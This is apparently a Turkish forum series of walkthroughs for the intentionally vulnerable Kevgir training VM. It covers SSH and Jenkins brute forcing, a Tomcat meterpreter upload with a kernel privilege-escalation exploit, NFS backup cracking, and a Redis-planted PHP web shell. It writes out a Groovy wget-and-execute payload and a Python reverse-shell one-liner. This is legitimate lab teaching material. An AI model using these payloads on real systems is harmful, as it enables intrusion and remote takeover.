Kevgir VM Çözümleri // Red Team

Merhaba arkadaşlar , bu konumuzda Red Team olarak sizlerle "Kevgir" isimli zafiyetli makineyi çözeceğiz.

Kevgir VM Nedir ?
Kevgir VM , canyoupwn.me Ekibi tarafından siber güvenlik alanına yeni başlayan insanlar için hazırlanmış , içerisinde web uygulama zafiyetleri, sunucu zafiyetleri , yerel hak yükseltme zafiyeti gibi bir çok zafiyet barındıran bir sanal makinedir.


SSH Bruteforce ile başlayalım :

Adettendir , zafiyetli makine / CTF çözerken ilk önce sızacağımız makinenin IP adresi tespit edilir.

komutu ile yerel ağda bulunan makineleri tespit edebilirsiniz ;



Kevgir makinemizin IP adresini 192.168.0.16 olarak tespit ettik , şimdi sırada "Aktif Bilgi Toplama" kısmı var.Bu kısımda makinede çalışan servisleri , versiyon bilgilerini ve makinenin işletim sistemi gibi kritik bilgileri nmap ile öğreneceğiz.

Nmap detaylı bilgi için :
https://www.turkhackteam.org/siber-guvenlik/1540515-nmap-nedir-ne-ise-yarar.html
https://www.turkhackteam.org/siber-guvenlik/1525865-herseyi-ile-nmap-nedir-belvando.html




Evet arkadaşlar , çalışan servisleri , servislerin versiyonu vb. bilgiler önümüze döküldü.Dikkatinizi çekmek istediğim bir konu var , SSH default olarak 22 . portta çalışır ancak bu makinede SSH 1322 . portta çalışıyor.Bu önemli bir bilgi , çalışan servisler default portlarında çalışmak zorunda değildir , müsait olan her portta çalışabilirler.Bu bilgiyi de not ettiğimize göre sırada SSH kullanıcılarını bulmaya geçebiliriz ;

Bu kısımda kullanacağımız komut "enum4linux" tür.Bu uygulama bize linux sistemler için çeşitli bilgi toplama hizmeti sunar.



Gördüğünüz gibi 3 adet kullanıcı ismine ulaştık :
user
admin
root

Bu kullanıcıları txt dosyasına kaydediyoruz ve artık bruteforce için hazırız.Bu kısımda Hydra isimli uygulamayı kullanacağız :
Hydra hakkında detaylı bilgi için :
https://www.turkhackteam.org/mail-guvenligi/1803197-thc-hydra-tool-u-nedir-nasil-kullanilir.html

Şimdi resme geçmeden önce aklımızda soru işareti kalmaması için kullandığımız parametreleri inceleyelim ;
hydra - uygulamanın adı
-L : kullanıcı listesi yolu
-e nsr : "n" null parola dene, "s" kullanıcı adını parola olarak kullan ve "r" kullanıcı adını tersine çevirerek parola olarak kullan.
-s : Bu parametre çalışan hizmetin portunu belirlememize yarar.Eğer örnekteki gibi bruteforce yapılacak hizmet default portta bulunmuyorsa bu parametre ile hizmetin çalıştığı portu belirtmek zorundayız.
ssh : Bruteforce yapılacak hizmet.

Parametreleri anladığımıza göre bruteforce işlemini uygulayabiliriz :




Evet sevgili arkadaşlar , gördüğünüz gibi hydra bize iki adet giriş bilgisi gönderdi

admin:admin
user:resu


İlerleyen konularda bu giriş bilgileri ile ne yapacağımızı öğreneceğiz. ​

Merhaba arkadaşlar, bu yazımızda Kevgir VM üzerinde bulunan kullanıcı adı ve şifresi default olarak bırakılan Apache Tomcat servisine sızıp yetki yükselteceğiz ve root olacağız

Apache Tomcat nedir ?
Apache Tomcat, Java Server Pages yani JSP sayfalarının çalışması için kullanılan bir sunucu hizmetidir.

Öncelikle makinemizin 8080. portuna tarayıcımızdan giriş yapıyoruz




Gördüğümüz gibi default tomcat index'i geliyor , manager webapp 'e tıkladığımız zaman ise Basic HTTP Authentication ile karşılaşıyoruz ;



Evet , şimdi yönetim paneline sızabilmek için "Met.asploit Framework" kullanacağız

komutu ile konsolumuzu açıyoruz



msfconsole içerisindeyken ;

komutu ile Met.asploit Framework içerisindeki Tomcat modüllerini inceliyoruz



Login kısmına BruteForce saldırısı gerçekleştireceğimiz için resimdeki auxiliary modülünü kullanıyoruz




Remote Host , Remote Port gibi bilgileri verdikten sonra ;

Komutu ile modülümüzü çalıştırıyoruz ;



Evet arkadaşlar gördüğümüz gibi login bilgileri önümüze düştü.

tomcat:tomcat

Bilgileri ile yönetim paneline sızabiliyoruz.



Sağlamasını yapmak için webapp manager'a tomcat:tomcat ile girip panele erişim sağladık.Şimdi panele "meterpreter" enjekte edip sisteme sızmamız gerek

Bunun için msfconsole 'a dönüp ;

Komutuyla Tomcat'e panelden meterpreter yükleyecek olan exploit'i seçiyoruz.



Gerekli parametreleri ayarlayıp payload'ımızı " java/meterpreter/reverse_tcp" olarak seçiyoruz.Bu sayede exploit'i çalıştırdığımız zaman , eğer her şeyi doğru yaptıysak , önümüze meterpreter session'ı düşecek ;



Meterpreter session 'ımızı aldık , şimdi

Komutu ile Linux komutları çalıştırabilmek için Linux shell'i alacağız




Shell'i aldık , şimdi sırada interaktif shell almak var , interaktif shell alınca daha önce SSH Bruteforce yöntemiyle bulduğumuz kullanıcılardan biri olarak giriş yapabileceğiz.Interaktif shell ' i

komutu ile alabilirsiniz.Interaktif shell almak , tomcat kullanıcısının komut yürütme kısıtlılığını kaldıracaktır.Bu aşamadan sonra

Komutu ile admin kullanıcısına geçeceğiz.




Komutu ile makinenin Kernel sürümünü öğrendik.

Şu an makinede admin kullanıcı olarak oturum açmış bulunmaktayız.Bu aşamadan sonra Linux 4.3.3 kernel'inde bulunan Yerel Yetki Yükseltme ( Local Privilege Escalation ) zafiyetini kullanarak makinede root olacağız.Google'da "Linux 4.3.3 LPE" aramasını yapıyoruz ve karşımıza ;

https://www.exploit-db.com/exploits/39166

Zafiyet çıkıyor.Zafiyetin ham halini siteden alıyoruz ve
https://www.exploit-db.com/raw/39166

Editörü ile kodu "localyetki.c" ismiyle makineye kaydediyoruz. Daha sonra

Komutu ile exploit'i derliyoruz.Derlenen exploit a.out olarak kaydediliyor.

Komutu ile exploit'i çalıştırıyoruz ve bu adıma kadar her şeyi doğru yaptıysak , root kullanıcısı oluyoruz ;





​

Jenkins
Merhaba arkadaşlar bu yazı da sizlere kevgir vm içerisinde bulunan bir diğer zafiyetli sistem olan jenkins sunucusuna sızmayı göstereceğim. Öncelikle biraz teorik bilgi vermek istiyorum.

Jenkins nedir?
Jenkins, açık kaynak kodlu bir otomasyon sunucusu ve Java ile geliştirilmiş bir entegrasyon aracıdır. Kodlama sonrası yazılım geliştirme süreçlerinin otomatikleştirilmesini sağlayan continuous aracıdır. Çok fazla bir ön bilgi vermeyeceğim merak eden arkadaşlarım araştırarak çok daha fazlasını bulabilirler Bu ön bilgiden sonra artık başlayabiliriz.


Daha önceki yazılarda olduğu gibi nmap taraması atarak jenkins'in çalıştığı port'u öğrenerek başlayalım. Aşağıdaki resim de görüldüğü gibi jenkins bu makine üzerinde 9000 port'unda çalışıyor. Jenkins üzerinde Script Console denilen bir alan mevcut ve burada groovy script diliyle kodlar yazıp çalıştırılabilir. groovy diliyle ilgili daha fazla bilgi için Buradan ulaşabilirsiniz.




Jenkins servisin nerede çalıştığını bulduğumuza göre adresi bir ziyaret edelim.





Bizi karşılayan ekran tam olarak yukarıda ki gibidir. Kırmızı ok ile gösterdiğim yerde bir login ekranı karşımıza geliyor, buradan sonra artık kaba kuvvet saldırısı ile çözebileceğimi düşünerek msfconsole geçiş yapıyorum msfconsole içerisinde jenkins_login adında hazır bir modül var, bunu kullanabiliriz.



Burada ilk olarak kullanacağım modülün tam adını buldum daha sonra sırasıyla;

Kod:

[CENTER]use auxiliary/scanner/http/jenkins_login
set RHOSTS 192.168.1.13
set RPORT 9000
set user_file /root/Desktop/user.txt
set pass_file /root/Desktop/pass.txt[/CENTER]

Parametrelerini girerek modülü hazır getirdim kullandığım şifre ve kullanıcı adı txt dosyalarını ben kendim oluşturdum ve onların yolunu gösterdim, en nihayetinde de çalıştırdığım zaman bana kullanıcı adını admin parolayı ise hello olarak buldu.
Kullanıcı ve parolayı bulduktan sonra ise artık sisteme girebiliriz ve yukarı da bahsettiğim Script Console alanına ulaşabiliriz.

Aşağıya bir kaç tane jenkins sistem hackleme ile ilgili bir kaç yazıya da göz atabilirsiniz ve biraz daha bilgi sahibi olabilirsiniz.

Let’s hack a jenkins server! – Dan.Thoeisen.dk
https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password/
https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/

Şimdi arkadaşlar sisteme girdik Script Console alanına sırasıyla sol tarafta bulunan menüden Manage Jenkins tıklayarak biraz aşağıya inerek Script Console alanına ulaşabilirsiniz. Aşağıdaki resimde kırmızı oklar ile belirtilmiştir.



Artık kod alanına ulaştığımıza göre bizim sunucu üzerinden komut çalıştırmaya yarayacak kodlara geçelim , aşağıda bulunan her hangi bir kod bloğunu alarak işlem yapabilirsiniz.

Kod:

[CENTER]println new ProcessBuilder('komut','argüman').redirectErrorStream(true).start().text;  
 // veya  
 def sout = new StringBuffer(), serr = new StringBuffer()  
 def proc = 'komut'.execute()  
 proc.consumeProcessOutput(sout, serr)  
 proc.waitForOrKill(1000)  
 println "out>; $sout err>; $serr"  
 //veya  
 def process = "komut".execute()  
 println "Sonuc: ${process.text}"  [/CENTER]

Bu kod parçaları yukarı linklerini bırakmış olduğum konu anlatımlarında farklı farklı her biri anlatılmıştır.

Reverse meterpreter shell'i almak için ben, msfconsole içerisindeki web_delivery modülünü kullanacağım. Bu modül, Python, PHP ve Powershell'e özel ürettiği payloadlar ile linux/windows sistemler üzerinde shell açmamızı sağlar.

Şimdi arkadaşlar normal şartlarda kullandığımız modülde direkt olarak çalıştırıp çıktı ile shell alabilmemiz gerekiyor ama " ' " (tek tırnak) bazen sıkıntılar çıkarabiliyor öncelik olarak aşağıda sırasıyla msfconsole ve Script Console üzerine yazacağımız kodlara geçiyoruz.



Burada ilk kırmızı ile belirtiğim alanı kopyalıyoruz ve Script Console üzerine geçip şöyle bir kod yazıyoruz.

Kod:

[CENTER]def process = "wget http://192.168.1.5:8080/vyqutKt8CPbmj -O /tmp/deneme".execute()  
def process2 = "ls -l /tmp".execute()  
def process3 = "python /tmp/deneme".execute()[/CENTER]

Buradan wget ile çekip tmp klasörünün altına deneme ismiyle kaydediyorum ve bu dosyayı çalıştırıyorum.



En sonunda ise Script Console üzerinde run diyerek sunucu üzerinde komutumuzu çalıştırmış olduk ve en sonunda shell alabildik.



Bir sonraki yazımız da Redis sunucusuna sızmayı göreceğiz.






​

Kevgir VM : NFS

Merhaba arkadaşlar , bu yazımızda sizlerle beraber Kevgir VM de bulunan NFS ile alakalı bir zafiyeti inceleyeceğiz.Network File System , UNIX/Linux sistemlerde ağ içerisinde dosya paylaşmaya yarayan bir dosya sistemidir. Bu zafiyette , kontrolsüzce ortada bırakılan hassas dosyalara erişim sağlayacağız.





showmount komutu ile hedef sistemdeki paylaşıma açık dosyaları belirledik
mount komutuyla almak istediğimiz dosyayı aldık
Ve açık olarak paylaşılan backup dosyasını bilgisayarımıza başarıyla indirdik.

Dosyayı inceledik ve parola korumalı olduğunu gördük , o yüzden sıradaki işlem BruteForce işlemi olacak ;



BruteForce işlemi tamamlandı ve parolayı aaaaaa olarak aldık

Bundan sonra parolayı girerek dosyalara erişim sağlayabiliriz ;

Kevgir VM Walkthrough : REDIS

Herkese merhaba arkadaşlar, Kevgir VM Walkthrough serisinin bir diğer yazısı REDIS üzerine olacaktır.
Öncelikle biraz redis hakkında ön bilgi ile başlamak istiyorum. En basit haliyle Redis, key-value şeklinde tasarlanmış bir NoSQL(Not Only SQL) veritabanıdır. Şimdi NoSQL kavramı ne diyen arkadaşlarım için en basit olarak şöyle diyebilirim ne tablo var ne de bu tablolar arası ilişki var bunların hiç biri yok, bunların yerine ise, JSON veya XML formatın da dosyalar da saklanırlar ve disk üzerinde değil, RAM(Random Access Memory) üzerinde saklanırlar ve bu da çok fazla bir performans artışı verir.
Bu kadar ön bilginin yeterli olduğunu düşünerek artık makine üzerine geçmek istiyorum.

İlk olarak nmap taraması yaparak redis kaç numaralı port üzerinde çalışıyor onu öğrenerek başlıyorum.



Nmap çıktısında görüldüğü üzere redis 6379 numaralı port üzerinde çalışmaktadır.
Nmap içerisinde bulunan redis-info adlı script ile sunucuyla ilgili daha fazla bilgiye ulaşabiliriz.

Kod:

[CENTER]nmap 192.168.1.13 -p 6379 -PN --script redis-info[/CENTER]

Benzer bilgileri msfconsole üzerinde

Kod:

[CENTER]use auxiliary/scanner/redis/redis_server[/CENTER]

adlı modül ile de elde edebilirsiniz ama çıktılar nmap'e göre biraz daha karışıktır.

Daha sonra ise redis sunucusu ile iletişim kurabilmek ve daha da detaylı bilgiler elde edebilmek için bazı redis araçları vardır, öncelikle bunların kurulumunu gerçekleştirmemiz gerekiyor. Bu araçların kurulumu için

Kod:

[CENTER]apt-get install redis-tools[/CENTER]

diyerek kurabiliriz.

Kurulum bittikten sonra ise

Kod:

[CENTER]redis-cli -h <ip_adresi>[/CENTER]

syntax bu şekildedir.



INFO diyerek çok daha ayrıntılı bilgilere ulaşabilirsiniz ama burada asıl mesele herhangi bir authentication mekanizması yok, kimlik doğrulaması konmamış olması, direkt olarak sunucu üzerinde çalışan redis servisine oturum açtık. Artık sistem üzerinde dosya ya da içerik yazabiliriz.

İlk olarak arkadaşlar Redis üzerinden, komut enjeksiyona sebep olabilecek bir PHP dosyası web servis dizinine yüklenebilir. Yüklenebilecek örnek bir komut aşağıdaki gibidir.

Kod:

[CENTER]<?php $sonuc=$_GET['komut']; echo `$sonuc`; ?>[/CENTER]

Bu ifadeyi içeren dosya, Redis komut satırı ile hedef web dizinine yüklenir.



Sırasıyla;

Kod:

[CENTER]CONFIG SET dir /var/www/html/main
CONFIG GET dir
CONFIG SET dbfilename <dosya_adı>
CONFIG GET dbfilename
SET cmd "<?php system($_GET['komut']); ?>"
BGSAVE[/CENTER]

Burada sırasıyla arkadaşlar /var/www/html dizinine deneme.php isimli bir dosya oluşturdum ve içerisine yukarıda vermiş olduğum php kod parçasını yazdım. Daha sonra bu dosya GET isteğiyle komut parametresinde ki değeri alıp sunucu üzerinde komut çalıştırabilen system'e gönderdi. En son ise her şeyi kayıt edip arka planda çalışmasını sağlıyoruz.

Şimdi web sayfasında deneme.php'nin olduğu yere gidip yapılandırdığımız komutları yazalım.

Kod:

[CENTER]view-source:http://192.168.1.13/deneme.php?komut=uname%20-a[/CENTER]

Daha sonra ise mevcut sanal makinede, ters bağlantı elde etmek için, dinleyici başlatılarak aşağıdaki gibi bir python komutu kullanılabilir.

Kod:

[CENTER]nc -nlvp 5555[/CENTER]

Kod:

[CENTER]view-source:http://192.168.1.13/deneme.php?komut=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
;s.connect((%22192.168.1.2%22,5555));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27[/CENTER]

Sonuç olarak web hizmeti veren kullanıcı yetkileri ile komut satırı elde edilmiş olur.


​